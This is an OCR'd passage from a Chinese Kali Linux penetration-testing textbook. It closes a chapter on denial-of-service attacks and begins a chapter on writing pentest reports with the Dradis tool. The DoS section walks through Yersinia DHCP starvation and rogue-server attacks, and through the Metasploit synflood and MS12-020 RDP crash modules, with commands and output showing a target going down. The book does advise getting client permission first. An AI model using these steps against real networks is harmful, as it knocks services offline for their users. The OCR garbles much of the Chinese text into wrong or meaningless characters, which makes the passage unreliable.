STP、VTP 等 ， 如 图 15-7 所 示 。 


Choose attack ooo | 


CDP DHCP | 802.1Q 802.1x | DTP | HSRP | ISL | MPLS | STP | VIP 
Choose attack 


Description Dos 
(& sending CDP packet 

O flooding CDP table 

O Setting up a virtual device 


| Cancel | OK | 


图 15-7 Yersinia 多 攻击 方式 选择 界面 


在 如 图 15-8 所 示 的 “Choose attack” 对 话 框 中， 我 们 可 以 选择 要 攻击 
的 协议 以 及 具体 的 攻击 方式 ， 这 里 选择 标签 “DHCP”。 


Choose attack o oso | 
CDP | DHCP | 802.10 | 802.1X | DTP | HSRP | ISL | MPLS | STP | VIP 
Choose attack 


Description Dos 
(2 sending RAW packet 

@ sending DISCOVER packet 

© creating DHCP rogue server 

(O sending RELEASE packet 


| Cancel | OK | 





图 15-8 ”DHCP 服务 攻击 界面 


基于 DHCP 协 议 的 攻击 中 一 共 提 供 了 4 种 发 包 形 式 ， 其 中 “sending 
DISCOVER packet” 形 式 默 认 的 束 米 用 了 拒绝 服务 攻击 后面 的 DoS 复 选 
框 中 显示 被 选中 状态 ) 。 这 4 种 模式 的 含义 其 体 如 下 所 示 。 


e sending RAW packet: 发 送 原始 数据 包 。 

e sending DISCOVER packet: 友 运 请求 获取 IP 地 址 数据 包 ， 占 用 所 有 
的 IP， 造 成 拒绝 服务 。 

e creating DHCP rogue server: 创建 虚假 DHCP 服 务 右 ， 让 用 户 连 接 ， 
导致 真正 的 DHCP 无 法 工作 。 

e sending RELEASE packet: 及 送 释放 耳 请 求 到 DHCP 服 务 左 ， 致 使 正 
在 使 用 的 IP 全 部 失效 。 


我 们 选中 这 个 方法 之 后 单 击 “OK”， 即 可 开始 攻击 。 


Yersinia 0.7.3 oo o0 
File Protocols Actions Options Help 
5 三 a TŘ, M 

Launch attack Edit interfaces Load default Listattacks Clear stats Capture Edit mode Exit 
Er CDP | DHCP | 802.1Q 802.1X DTP | HSRP ISL MPLS | STP | VTP | Yersinia log 
802.1X 255.255.255.255: 01 DISCOVER: eth0 19 Oct 03:46:28 

255.255.255.255: 01 DISCOVER: eth0 19 Oct 03:46:28 

255.255.255.255: 01 DISCOVER: eth0 19 Oct 03:46:28 





19 Oct 03:46:28 
255.255.255.255: 01 DISCOVER: eth0 19 Oct 03:46:28 
255.255.255.255: 01 DISCOVER: eth0 19 Oct 03:46:28 
255.255.255.255: 01 DISCOVER: eth0 19 Oct 03:46:28 
19 Oct 03:46:28 








SIP 0.0.0.0 





DIP 255.255.2 
SPort 68 
DPort 67 


图 15-9 ”使 用 Yersinia 进 行 DHCP 攻 击 产 生 的 数据 包 


执行 攻击 后 ， 右 侧 框 1 处 显示 的 就 是 发 送出 去 的 攻击 数据 包 ， 如 果 
希望 查看 某 一 个 数据 包 的 具体 内 容 ， 可 以 单 击 一 个 数据 包 。 在 框 2 处 显 
示 的 就 是 这 个 数据 包 的 详细 内 容 。 可 以 看 到 这 个 工具 不 断 地 向 外 发 送 广 
Y MZ JE o 


HÁTA. Yersinia zz EAW Ex VJ AS 38 Aci dhcp discover 数 据 
包 ， 很 快 dhcp serverdttdil 708 AMA BS ARIPBARE TAS HI. GSTE RH LG 
法 获取 IP 地 址 ， 整 个 网 络 陷于 次 奖状 态 。 


男 外 理论 上 所 有 提供 连接 的 协议 都 可 能 会 受到 拒绝 服务 的 攻击 ， 
Metasploit 中 提供 了 很 多 用 于 各 种 协议 的 拒绝 服务 攻击 模块 ， 我 们 可 以 
局 动 Metasploit， 并 在 其 中 和 玛 询 使 用 对 应 的 模块 。 


root@kali:~# msfconsole 


成 功 局 动 Metasploit 之 后 ， 可 以 使 用 search 命 令 来 查找 与 dos( 拒 绝 
服务 攻击 ) 相关 的 模块 ， 如 图 15-10 所 示 。 


Matching Modules 


Disclosure Date Rank 


auxiliary/admin/chromecast/chromecast reset 
auxiliary/admin/webmin/edit html fileaccess 
auxiliary/dos/android/android stock browser iframe 
auxiliary/dos/cisco/ios http percentpercent 
auxiliary/dos/dhcp/isc dhcpd clientid 


2012-09-06 
2012-12-01 
2000-04-26 


auxiliary/dos/dns/bind tkey 
auxiliary/dos/freebsd/nfsd/nfsd mount 
auxiliary/dos/hp/data protector rds 
auxiliary/dos/http/3com superstack switch 
auxiliary/dos/http/apache commons fileupload dos 
auxiliary/dos/http/apache mod isapi 
auxiliary/dos/http/apache range dos 
auxiliary/dos/http/apache tomcat transfer encoding 
auxiliary/dos/http/canon wireless printer 
auxiliary/dos/http/dell openmanage post 
auxiliary/dos/http/f5 bigip apm max sessions 
auxiliary/dos/http/gzip bomb dos 
auxiliary/dos/http/hashcollision dos 
auxiliary/dos/http/monkey headers 
auxiliary/dos/http/ms15 034 ulonglongadd 
auxiliary/dos/http/nodejs pipelining 
auxiliary/dos/http/novell file reporter heap bof 
auxiliary/dos/http/rails action view 
auxiliary/dos/http/rails json float dos 
auxiliary/dos/http/sonicwall ssl format 
auxiliary/dos/http/webrick regex 
auxiliary/dos/http/wordpress long password dos 
auxiliary/dos/http/wordpress xmlrpc dos 
auxiliary/dos/mdns/avahi portzero 
auxiliary/dos/misc/dopewars 
auxiliary/dos/misc/ibm sametime webplayer dos 
auxiliary/dos/misc/ibm tsm dos 


2015-07-28 


2011-01-08 
2004-06-24 
2014-02-06 
2018-03-05 
2011-08-19 
2010-07-09 
2013-06-18 
2004-02-26 


2004-01-01 
2011-12-28 
2013-05-30 


2013-10-18 
2012-11-16 
2013-12-04 
2013-11-22 
2009-05-29 
2008-08-08 
2014-11-20 
2014-08-06 
2008-11-14 
2009-10-05 
2013-11-07 
2015-12-15 





图 15-10 ”Metasploit 中 的 拒绝 服务 攻击 模块 列表 
这 里 列 出 Metasploit 中 的 所 有 拒绝 服务 攻击 模块 ， 我 们 仍然 使 用 这 


里 面 的 模块 来 对 目标 进行 一 次 syn 拒 绝 服务 攻击 ， 这 里 面 可 以 使 用 
auxiliary/dos/tcp/synflood 模 块 来 完成 这 个 攻击 ， 首先 选择 对 应 的 模块 。 


msf > use auxiliary/dos/tcp/synflood 


使 用 show opinions 来 查看 这 个 模块 的 参数 ， 如 图 15-11 所 示 。 


INTERFACE 


NUM 
RHOST 
RPORT 


SHOST 
SNAPLEN 
SPORT 
TIMEOUT 


图 15-11 synflood 攻 击 和 模块 的 参数 列表 


synflood 模 块 需要 的 参数 包括 RHOST、RPORT、SNAPLEN 和 
TIMEOUT， 后 面 的 3 个 参数 都 有 默认 值 ， 所 以 需要 设置 的 只 有 
RHOST， 这 也 正 是 我 们 要 发 起 拒绝 服务 攻击 服务 器 的 IP 地 址 。 这 个 目标 
必须 是 对 外 提供 HTTP 服 务 的 服务 器 。 


下 面 将 参数 设置 为 目标 192.168.1.101， 如 图 15-12 所 示 。 


auxil )» set RHOST 192.168.1.101 | 
Tw 








iliary( 
» 192.168.1.101 


图 15-12 synfloodix E&RHOSTÍH 


ER Je), n] EA fis Hlexploitíg S REA [o UnÉ15-13HTz5- 


msf auxiliary( ) > exploit | 





SYN flooding PEL RUE IHE D 


15-13 ”局 动 synflood 攻 击 
很 快 目 标 束 会 因为 攻击 而 停止 对 外 的 HITP 服 务 了 。 


如 朱 事 移 获 得 了 天 于 目标 足够 信息 的 话 ， 我 们 也 可 以 利用 目标 主机 
上 一 些 特定 有 的 服务 进行 拒绝 服务 攻击 。 例 如 很 多 人 部 拥有 两 台 以 上 的 计 
算 机 ， 一 合 在 单位 ， 夯 外 一 从 在 和 家里， 如 朱 上 班 时 间 没 有 完成 全 部 工作 
的 话 ， 回 到 家 中 可 以 远程 连接 到 单位 的 计算 机 。 但 是 这 需要 计算 机 近 供 


了 远程 控制 的 服务 ， 微 软 的 Windows 操 作 系 统 中 就 提供 了 远程 桌面 协 
议 ， 这 是 一 个 多 通道 (multi-channel) 的 协议 ， 用 户 可 以 利用 这 个 协议 
连 上 提供 做 软 终 咒 机 服务 的 计算 机 服务 冲 病 或 远程 计算 机 〉。 


但 是 微软 提供 的 这 个 服务 人 补 发 现存 在 一 个 编写 为 MS12-020 的 漏 
洞 ， Windows 在 处 理 某 些 RDP 报 文 时 Terminal Server 存在 错误 ， 可 被 利 
用 造成 服务 停止 啊 应 。 上 默认 情况 下 ， 任 何 Windows 操作 系统 都 未 局 用 
远程 果 面 协议 (RDP)。 没 有 局 用 RDP 的 系统 不 受 威胁 。 


我 们 还 是 在 metasploit 中 启动 对 应 的 模块 : 


msf > use auxiliary/dos/windows/rdp/ms12 020 maxchannelids 


B 使 用 “show options” 来 查看 这 个 模块 所 要 使 用 的 参数 ， 如 图 15-14 所 
ZN o 


msf auxiliary( ) > show options 


Module options (auxiliary/dos/windows/rdp/ms12 020 maxchannelids): 


Name Current Setting Required Description 


RHOST The target address 
RPORT 3389 The target port (TCP) 





图 15-14 ms12 020 maxchannelids 攻 击 模块 的 参数 列表 


这 个 模块 的 参数 也 十 分 简单 ， 只 需要 设置 一 个 RHOST 即 可 ， 这 也 
驶 是 目标 的 下地 址 ， 我 们 在 这 里 将 其 设置 为 192.168.1.101， 如 图 15-15 所 
示 。 


msf auxil 


msf auxiliary( ) > set RHOST 192.168.1.106 
RHOST => 192.168.1.106 


图 15-15 ”设置 ms12 020 _maxchannelids 攻 击 模 块 的 参数 


设置 完 攻击 目标 之 后 ， 我 们 就 可 以 对 目标 发 起 攻击 了 ,使 用 run 命 令 
发 起 攻击 ， 如 图 15-16 所 示 。 


msf auxiliary( ) > run 





| 192.168.1.106:3389 - 192.168.1.106:3389 - Sending MS12-020 Microsoft Remote Desktop 
Use-After-Free DoS 

192.168.1.106:3389 - 192.168.1.106:3389 - 210 bytes sent 

192.168.1.106:3389 - 192.168.1.106:3389 - Checkinq RDP status... 


[+] 192.168.1.106:3389 - 192.168.1.106:3389 seems down 
*] AUXI Llary moaute execution completed 





15-16 ms12 020 _maxchannelids 攻 击 结果 


寺 面 框 中 的 结束 显示 攻击 已 经 成 功 ， 目 标 主 机 已 经 关闭 。 


15.5 ”小结 


拒绝 服务 攻击 一 下 是 一 个 让 网 络 安全 人 员 感 到 无 比 头疼 的 问题 ， 受 
到 这 种 攻击 的 服务 右 将 无 法 提供 正 第 的 服务 。 通 党 我 们 所 说 的 拒绝 服务 
攻击 一 般 是 指 对 HTTP 服 务 占 友 起 的 TCP 连 接 攻 击 。 但 实际 上 拒绝 服务 
攻击 的 范畴 要 远 远 比 这 更 大 ， 本 和 章 按 照 TCP/AP 协 议 的 结构 ， 依 次 介绍 了 
数据 链 路 层 、 网 络 层 、 传 输 层 和 应 用 层 中 协议 的 漏 铀 ， 并 讲解 了 如 何 利 
用 这 些 漏 铜 来 肥 起 拒绝 服务 攻击 。 


这 一 革 中 使 用 到 了 几 个 十 分 强大 的 工具 ， 如 macof、hping3、 
yersinia、IMetasploit 等 ， 这 几 个 工具 各 有 特色 ， 它 们 组 合 起 来 几乎 可 以 
完成 所 有 的 拒绝 服务 攻击 。 尤 其 是 hping3， 古 一 蒜 最 为 姑 活 的 工具 ， 使 
用 它 我 们 几乎 可 以 构造 任何 需要 的 数据 包 。 在 本 章 中 ， 我 们 殉 使 用 
hping3 分 别 构造 了 基于 ICMP、UDP、TCP 的 拒绝 服务 攻击 。 之 后 我 们 又 
使 用 yersinia 完 成 了 针对 DHCP 协 议 的 拒绝 服务 攻击 。yersinia 可 以 完美 地 
完成 对 各 种 网 络 设备 的 拒绝 服务 攻击 。 在 本 和 章 的 最 后 ， 我 们 介绍 了 如 何 
使 用 metasploit 来 对 目标 发 起 拒绝 服务 攻击 。 拒 绝 服务 攻击 是 一 种 破坏 力 
很 大 的 渗透 方法 ， 在 对 一 个 测试 目标 采用 这 种 方法 之 前 ， 一 定 要 获得 客 
尸 的 许可 ， 并 事先 做 好 服务 颖 集 止 服务 的 准备 。 


本 章 中 介绍 的 部 是 从 一 台 计 算 机 友 起 的 ， 这 也 就 是 拒绝 服务 。 而 现 
在 更 为 常见 的 是 分 布 式 拒绝 服务 (Distributed Denial of Service, DDoS) 
攻击 ， 这 种 攻击 方式 指 借 助 于 客户 /服务 硕 扩 术 ， 将 多 个 计算 机 联合 起 
来 作为 攻击 平台 ， 对 一 个 或 多 个 目标 发 动 DDoS 攻击 ， 从 而 成 倍 地 提高 
拒绝 服务 攻击 的 威力 。 


下 一 重 将 是 本 书 的 最 后 部 分 ， 我 们 将 会 介绍 如 何 将 工作 成 末 以 书面 
的 形式 展示 出 来 ， 并 将 介绍 一 球 用 来 编写 渗透 测试 报告 的 工具 。 


551638 
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好 了 ， 到 此 为 止 我 们 已 经 对 目标 进行 了 完整 的 渗透 测试 ， 但 是 对 目 
标的 攻击 并 不 是 最 终 的 目的 。 正 确 的 做 法 应 该 是 将 及 现 的 问题 以 报告 的 
形 却 所 区 给 和 客户。 让 和 客户 能 够 理解 问题 的 严重 性 ， 并 对 此 作出 正确 的 回 
应 ， 及 时 进行 改正 ， 这 才 征 我 们 真正 应 该 做 的 。 这 一 切 需 要 通过 沟通 才 
能 完成 ， 除 了 与 客 尸 之 则 的 交流 之 外 ， 还 必须 问 客 尸 所 供 一 份 易 于 理解 
E ri A e 


渗透 测试 的 最 后 一 个 也 是 最 为 重要 的 一 个 阶段 就 是 报告 编写 。 作 为 
一 个 合格 的 渗透 测试 人 员 应 该 具备 良好 的 报告 编写 能 力 。 渗 透 测试 人 员 
在 编写 测试 的 时 候 应 该 保证 报告 的 专业 性 ， 但 是 这 份 报告 最 后 的 阅读 者 
往往 是 并 不 具备 专业 领域 知识 的 管理 人 员 ， 因 此 需要 避免 使 用 过 于 专业 
的 术语 ， 并 且 易 于 理解 。 鉴 于 目前 微软 办 公 软 件 的 普及 ， 即 使 是 专业 人 
士 也 大 都 会 采用 Word、Execl 来 编写 渗透 测试 报告 。 不 过 Kali Linux 21€ 
供 了 一 个 更 加 专业 的 报告 编写 工具 ， 利 用 这 些 工 具 可 以 便利 地 导入 扫描 
和 和 渗透 的 结果 ， 从 而 更 加 便利 地 编写 出 优秀 的 报告 。 


本 章 将 会 融 以 下 部 分 展开 介绍 : 


。 渗透 测试 报告 的 介绍 
。 使 用 Dradis 来 完成 渗透 测试 报告 


16.1 编写 渗透 测试 报告 的 目的 


如 末 将 我 们 整个 渗透 负 斌 的 过 程 看 做 是 工厂 中 的 生产 过 程 的 话 ， 那 
么 最 后 的 产品 驶 是 渗透 测试 报告 。 虽 然 很 多 初 入 职场 的 工程 师 和 学 生 都 
认为 编写 文档 是 一 件 技术 含量 不 局 的 工作 。 这 其 实 是 一 个 十 分 错误 的 观 
所。 渗透 测试 人 员 需 要 将 整个 渗透 测试 过 程 中 完成 的 工作 以 书面 报告 的 
人 
程 中 的 工作 。 


一 种 比较 粮 糙 的 情况 束 是 我 们 对 目标 进行 了 大 量 的 渗透 测试 工作 ， 
而 且 也 及 现 了 目标 网 络 中 存在 的 问题 ， 但 是 目标 网 络 的 管理 人 员 却 无 法 
理解 我 们 的 报告 ， 或 者 对 我 们 提出 的 问题 没有 足够 的 重视 ， 这 样 其 实 我 
们 在 渗透 负 试 时 所 化 强 的 时 间 和 精力 都 被 痕 这 了 。 


因此 一 份 合格 的 渗透 测试 报告 应 该 可 以 让 所 有 的 人 员 部 能 够 看 恒 ， 
而 且 轻 而 易 淮 地 友 现 报 各 中 指出 问题 的 重要 性 。 这 样 的 话 ， 浴 透 测 试 人 
An 
ZA o 
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分 内 容 必 须 避 人 免 长 视 大 论 ， 应 该 以 噩 度 精炼 的 方式 来 概述 我 们 在 整个 渗 
透 测试 阶段 的 工作 ， 视 幅 一 般 不 会 超过 几 个 段 沙 。 万 外 ， 在 撞 述 时 采用 
的 语言 也 应 该 尽量 人 简单， 不 要 使 用 任何 的 拉 术 术语 ， 侧 重播 述 目前 目标 
中 漏洞 可 能 市 来 的 风险 。 


渗透 测试 的 内 容 摘要 应 该 以 发 现 的 漏洞 作为 切入 点 ， 结 合用 户 的 实 
际 安全 需求 来 完成 。 打 个 比方 ， 如 果 现 在 我 们 是 为 一 家 银行 做 测试 ， 那 
么 银行 可 能 最 关注 的 束 是 所 有 客户 的 信息 ， 黑 客 可 能 会 利用 银行 对 外 发 
布 HITP 服 务 的 Web 程 序 来 窃取 这 些 信 息 。 我 们 在 进行 报告 的 编写 过 程 
中 就 应 该 重点 描述 在 测试 过 程 中 所 发 现 与 此 相关 的 漏洞 。 如 果 在 测试 过 
程 中 没有 发 现 这 一 类 的 漏洞 ， 束 应 该 明确 地 说 明 这 个 事实 。 


由 容 摘 要 中 还 应 该 说 明 为 什么 要 进行 这 砍 安 全 渗透 测试 。 
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可 能 只 在 其 中 一 两 全 设备 友 现 了 问题 。 当 我 们 在 编写 渗 史 测试 时 ， 丰 将 
所 有 服务 更 的 信息 都 与 入 报告 中 呢 ， 还 是 只 需要 将 有 问题 的 说 备 信息 写 
dE E; HE? 


和 这 一 点 相交 似 的 是 ， 我 们 在 编 与 渗透 测试 报告 的 时 候 ， 古 将 渗透 
过 程 中 的 全 部 测 弃 都 与 入 渗透 报告 中 ， 还 是 只 将 肥 现 问题 的 负 弃 与 入 渗 
Xd? 

实际 上 目前 对 这 个 问题 并 没有 一 个 权威 的 舍 采 ， 不 同 的 机 构 或 者 专 
家 对 此 可 能 会 有 截然 不 同 的 看 法 ， 两 种 做 法 各 有 利 靖 。 


16.4 ”安全 交付 渗透 测试 报告 


渗透 测 斌 的 最 后 一 个 步骤 吏 是 将 编写 好 的 报 香 交 付 给 客户 。 一 般 来 
襄 每 一 个 机 构 都 会 使 用 专业 的 加 密 软 件 。 如 果 你 所 在 的 是 一 个 创业 型 企 
业 ， 没 有 购买 这 方面 的 软件 ， 那 么 你 也 可 以 使 用 zip 格 陈 来 对 报告 进行 
I 虽然 这 样 做 看 起 来 不 是 十 分 专业 ， 但 是 要 比 一 份 明文 的 报告 要 好 
得 多 。 

这 样 我 们 将 加 密 乙 后 的 报告 和 秘 钥 分 开 传递 给 客户 。 比 如 说 可 以 以 
邮件 或 者 U 一 的 形 却 交 给 客户 ， 而 秘 钥 则 以 一 个 更 安全 的 方 陈 传 


人 A 
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由 于 目前 安全 行业 中 并 没有 一 份 完全 统一 的 标准 ， 这 一 点 给 渗透 测 
试 从 业 人 员 在 编写 报告 时 带 来 了 困难 。 而 那些 刚刚 进入 这 个 行业 的 人 员 
可 能 更 会 感到 困惑 ， 到 底 在 一 份 渗透 测试 报告 中 应 该 包含 哪些 内 容 呢 
这 些 内 容 又 是 如 何 组 织 的 呢 ? 


由 于 一 次 渗透 测 放 需 要 的 时 间 比 较 长 ， 在 此 期 间 完 成 了 大 量 的 工 
作 ， 我 们 可 以 使 用 WAPITI 模 型 来 将 这 些 工 作成 末 组 织 在 一 起 。 


WAPITI 模 型 一 共 包 括 六 点 : 


W -TAEMA ERA. 

A ”一 在 渗透 训 试 过 程 使 用 的 方法 。 

P ”= 在 渗透 测 放 过 程 肥 现 的 问题 。 

1 ”一 这 些 友 现 问 题 会 给 目标 市 来 的 影 啊 。 
T = 给 目标 提出 改正 的 方案 。 

I ”一 明确 客户 已 经 清楚 了 人 解 报告 的 内 容 。 


16.6 ”使 用 Dradis 来 完成 渗透 名 试 报告 


现在 我 们 已 经 明确 了 在 一 份 渗透 测 弃 报 委 中 应 该 包 侣 的 髓 容 。 而 在 
贿 与 渗透 测试 报告 的 过 程 中 ， Kali Linux 2 同样 提供 一 些 高 效 的 工具 供 我 
们 使 用 。 这 里 面 的 第 12 个 分 类 “Reporting Tools” 就 是 专门 用 来 编写 报告 
的 工具 。 我 们 以 其 中 最 为 流行 的 Dradis 来 作为 沁 例 ， 这 是 一 个 开源 的 协 
作 和 报告 框架 。 这 个 框 染 由 Ruby 开 发 ， 而 且 提 供 了 Web 操 作 界 面 ， 即 使 
是 一 个 新 手 也 能 轻松 地 使 用 。 


16.6.1 Dradis 的 基本 应 用 


首先 ， 我 们 来 局 动 这 个 工具 Dradis， 这 个 工具 位 于 “Applications” 中 
的 “Reporting Tools” 分 类 中 ， 如 图 16-1 所 示 。 


不 过 不 能 直接 在 这 里 启动 Dradis， 因 为 Dradis 采 用 了 B/S 的 工作 方 
式 。 也 就 是 说 需 €— 然后 才能 启动 这 个 工具 。 这 样 
做 的 优势 在 于 如 果 在 一 台 计 算 机 上 局 动 了 Dradis 服 务 ， 用 户 可 以 在 其 他 
计算 机 上 使 用 浏览 右 访 问 RA 


现在 我 们 首先 在 Kali Linux 2 中 来 启动 Dradis 服 务 ， 如 图 16-2 所 示 。 
局 动 了 这 个 服务 之 后 ， 就 可 以 使 用 Dradis 服 务 右 的 IP 地 址 和 3000 闹 


口 来 访问 这 个 框 染 ， 例 如 我 们 现在 就 可 以 在 Kali Linux 2 中 使 用 浏览 器 
http://127.0.0.1:3000/ 访 问 这 个 服务 。 
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casefile 
cutycapt 
dradis 
faraday IDE 
keepnote 
magictree 
pipal 


recordmyd... 


beef start 
beef stop 
dradis start 


dradis stop 


图 16-2 ”启动 Dradis 服 务 


顺 硕 中 输入 这 个 地 址 之 后 ， 可 以 看 到 如 图 16-3 所 示 的 工作 界 


Dradis Community Edition - Mozilla Firefox 


x | + 





| @ Dradis Community Edi... 





Eg Most Visited v fllOffensive Security Kali Linux ‘Ñ Kali Docs "Ñ Kali Tools KExploit-DB W Aircrack-ng 


Configure the shared password 


Hold your horses! 


This server does not have a password yet, please set up one: 
Password 


Confirm Passwor d 


Set password and continue 


K|16-3 ”Dradis 的 密码 初始 化 界面 


第 一 次 访问 这 个 Dradis 服 务 的 时 候 ， 需 要 对 这 个 服务 进行 设置 ， 所 
以 页 面 会 跳 转 到 127.0.0.1/setup， 也 就 是 初始 化 页 面 ， 在 这 个 页 面 中 我 们 
自 先 要 人 设置 密码 ， 设 置 并 确认 之 后 ， 单 击 下 面 的 “Set password and 
continue” 按 钮 。 

接 下 来 就 是 登录 界面 ， 如 图 16-4 所 示 ， 使 用 任意 的 用 户 名 和 刚才 设 
置 的 密码 束 可 以 登录 。 


Dradis Community Edition - Mozilla Firefox o o o0 | 
j 国 Dradis Community Edi... x | * 
C ||Q Search * 8 + 会 = 





€) 9G | 127.0.0.1:3000/logii 
Ey Most Visited v BllOffensive Security "X Kali Linux "& Kali Docs Ñ Kali Tools KlExploit-DB W Aircrack-ng 


Dradis Community Edition 


All done. May the findings for this project be plentiful! 


Login LHF 





Password | eeeeee | 





Let me in! 





图 16-4 ”Dradis 的 密码 登陆 界面 
现在 可 以 看 到 如 图 16-5 所 示 的 Dradis 操 作 界 和 面 了 。 


Issues so far Methodology progress 





Recent activity 





图 16-5 “Dradis 的 管理 界面 


如 图 16-6 所 示 ， 每 一 个 Dradis 中 的 项 目 都 包含 如 下 4 个 部 分 。 


Dradis CE 





ss Nodes 








图 16-6 Dradis 项 目 所 包含 的 内 容 


。 Issues (问题 ) : 这 个 部 分 是 我 们 在 渗透 测试 过 程 中 发 现 的 安全 缺 
Báo : Mee E BEDA UA ER T A HI 388: AC E F e 

e People CAT) : RE MEXEN 试 项 目 都 会 分 配给 一 个 项 目 团队 ， 
a RAIE 目 团 队 可 能 只 有 一 个 人 。 只 有 这 个 团队 的 成 员 才 可 以 
修改 和 浏览 Dradis 中 的 这 这 个 项 日 。 


e Methodologies (方法 ) : 这 个 部 分 会 列 出 渗透 测试 所 需要 完成 的 任 
务 列 表 。 
3 


e Nodes CHE: 这 个 部 分 类 似 于 操作 系统 中 的 文件 夹 。 利 用 节点 
我 们 可 以 将 整个 项 目的 内 容 组 织 起 来 。 如 果 你 是 对 一 个 网 络 进 行 渗 
透 测 斌 的话 ， 那 么 每 一 台 主 机 束 可 以 看 作 是 一 个 节点 。 如 果 是 对 一 
个 程序 进行 渗透 测试 的 话 ， 那 么 代码 中 的 子 模 块 束 可 以 看 作 是 一 个 


/NO 


接 下 来 我 们 分 别 介 绍 如 何 使 用 Nodes 和 Issues。 
16.6.2 ”在 Dradis 中 使 用 Nodes 


Dradis 中 的 Nodes 束 相当 于 操作 系统 中 的 文件 夹 ， 在 一 个 Dradis 项 日 
中 和 节点 相关 的 信息 包括 notes (注释 ) ~ attachments (HHF) 和 
evidence GEW) 。 我 们 在 编 与 报 香 的 时 候 ， 可 以 按照 进行 渗透 测试 的 
设备 作为 节点 。 例 如 我 们 可 以 将 一 全 目标 主机 作为 一 个 单位 来 编写 渗透 
测试 报告 。 图 16-7 中 左 侧 列表 中 的 Nodes 表 示 的 束 是 进行 的 所 有 设备 ， 
单 击 Nodes 右 侧 的 加 号 残 可 以 添加 一 个 新 的 布点 。 


ih Nodes 





图 16-7 构建 一 个 渗透 目标 为 两 个 主机 的 项 目 


首先 ， 我 们 使 用 Dradis 来 构建 一 个 项 目 ， 由 于 我 们 渗透 测试 的 目标 
有 上 所 不 同 ， 在 构建 项 目 时 可 能 融会 采用 不 同 的 方式 ， 下 面 移 给 出 一 个 如 
图 16-7 所 示 的 渗透 测试 目标 为 网 络 的 情况 。 


在 进行 测试 的 时 候 可 能 是 主机 和 网 络 ， 但 是 也 可 能 是 一 个 应 用 程 
FF s ata 目标 为 一 个 应 用 程序 的 时 候 ， 构 建 的 项 目 结构 看 起 来 会 如 多 
16-8PT7n o- 


现在 我 们 仍然 返回 到 目标 为 网 络 的 实例 ， 在 这 种 情况 下 ， 经 季 会 过 
到 添加 或 删除 主机 的 情况 ， 这 时 束 需 要 添加 或 者 删除 证 点。 下面 我 们 来 
器 项 目 中 洪 加 市 点 ， 这 个 市 扩 可 以 是 一 个 施 围 ， 也 可 以 是 里 独 的 一 个 主 
机 ， 根 据 情况 的 不 同 我 们 可 以 选择 十 洪 加 一 个 蛙 独 节操 ， 还 是 一 个 多 午 
廊 反 。 肯 和 完 来 添 加 一 个 单独 市 操 ， 如 图 16-9 所 示 。 


ia Nodes 





图 16-8 构建 一 个 渗透 目标 为 应 用 程序 的 项 目 


Dradis CE 


yÉ Allissue 


ia Nodes 





图 16-9 ”选中 Nodes 右 侧 的 添加 图 标 “+” 


接 下 来 会 弹出 一 个 窗口 ， 在 这 里 输入 对 渗透 设备 《网 络 、 主 机 或 者 
应 用 程序 ) 的 描述 作为 标签 ， 在 下 面 的 Type 中 选择 一 个 类 型 ， 如 果 你 的 
目标 是 一 个 网 络 的 话 就 使 用 Default， 如 果 是 一 个 主机 的 话 就 使 用 Host。 
这 里 面 我 们 使 用 “Host*， 然 后 单 击 “Add” 按 钮 ， 如 图 16-10 所 示 。 





Add top-level node 


You are adding a new top-level node. 


* Label HOST 192.168.0.1 


fullest — 31 
Default | 


图 16-10” 问 项 目 中 添加 一 个 Host 


当 我 们 添加 了 节点 之 后 ， 还 可 以 为 这 个 节点 执行 添加 子 节点 、 删 除 
节点 、 重 命名 和 移动 操作 ， 如 图 16-11 所 示 。 


uccessfullv created 
y 





图 16-11 市 点 的 基本 操作 


Dradis 中 的 节点 属性 采用 了 JSON 格式 ， 我 们 可 以 手动 地 对 其 进行 
修改 ， 修 改 的 方法 很 简单 ， 选 中 一 个 节点 之 后 ， 单 击 “edit”" 进 行 编辑 ， 
如 图 16-12 所 示 。 


Nodes 


Properties 


Notes 


Evidence Recent Activity 


图 16-12 ”对 节点 进行 编辑 


斑点 的 编辑 采用 了 “属性 : 值 ” 的 语法 ， 刚 开始 接触 这 种 语法 可 能 
不 习惯 ,但 是 这 种 语法 极为 精炼， 图 16-13 给 出 了 编辑 的 界面 。 


Edit properties 


图 16-13 ”节点 的 编辑 界面 


例如 我 们 这 个 节点 的 域名 为 wwwo.dradis.com， 主 机 的 IP 为 1.1.1.1， 
就 可 以 按照 如 下 所 示 的 格式 编写 。 


j 


RONDE. "www.dradis.com", 
"IP" "1.1.1.1" 





每 一 个 节点 代表 着 一 个 目标 ， 在 完成 了 对 节点 的 操作 之 后 ， 我 们 还 
需要 将 每 个 节点 存在 的 问题 和 证 明 这 个 问题 存在 的 证 据 六 加 进来 。 下 面 


来 介绍 如 何 向 Dradis 中 添加 Issues〈 问 题 )》 和 Evidence GEH ) à- 
16.6.3 ”在 Dradis 中 使 用 Issues 和 Evidence 


一 个 Issues 应 访 包 侣 安全 缺陷 的 信息 ， 比 如 标题 、 摘 述 、 建 议 、 相 
天 的 CVE 信 息 、 这 个 安全 缺陷 的 链接 等 。 而 一 个 Evidence 证 据 应 该 包 合 
细节 人 信息， 比如 痛 口 亏 公 、 应 用 程序 的 版 本 、 使 用 的 工具 等 。 


比如 说 我 们 在 目标 的 服务 右上 有 发现 了 一 个 老 旧 的 Apache 服 务 左 ， 而 
这 个 服务 器 上 有 两 个 端口 80 和 443。 我 们 可 以 使 用 Issues 来 描述 这 个 发 现 
问题 的 服务 器 ， 使 用 两 个 Evidence 来 描述 问题 的 细节 。 下 面 我 们 来 汰 加 
一 个 Issues， 首 先 单 击 最 左 侧 的 “All Issues”， 然 后 单 击 Issues 右 侧 的 加 
号 ， 如 网 16-14 所 示 。 


Dradis CE 





Issues 


图 16-14 ”在 Dradis 添 加 一 个 Issues 
然后 在 弹出 的 窗口 填写 详细 的 信息 ， 如 图 16-15 所 示 。 


Add new issue 


ELS P r e T I e W 


图 16-15 fEDradisZsJIll —T 3r JIssues 


例如 我 们 友 现 目标 主机 上 运行 看 一 个 已 经 过 时 的 Apache 服 务 右 。 这 
个 服务 存在 多 个 漏 稠 ， 我 们 按照 标题 (Title) MAR (Description) 两 
部 分 来 编写 这 个 Issues， 如 图 16-16 所 示 。 摘 述 部 分 除了 介绍 及 现 的 问题 
之 外 ， 也 可 以 给 出 访问 题 的 页 面 。 


— ? 


#[Title]# 
Out-of-date Apache server 


#[Description]# 
The version of the Apache HTTP server in several hosts under the scope of 
the assessment was found to be several versions behind the current 


DIDI D LLIII 


This was determined through the headers returned by the server as part of 
its responses and / or through the default server error pages. 


The version of the Apache HTTP server in use is known to be susceptible 
to various vulnerabilities including several Denial of Service (DoS) attacks. 


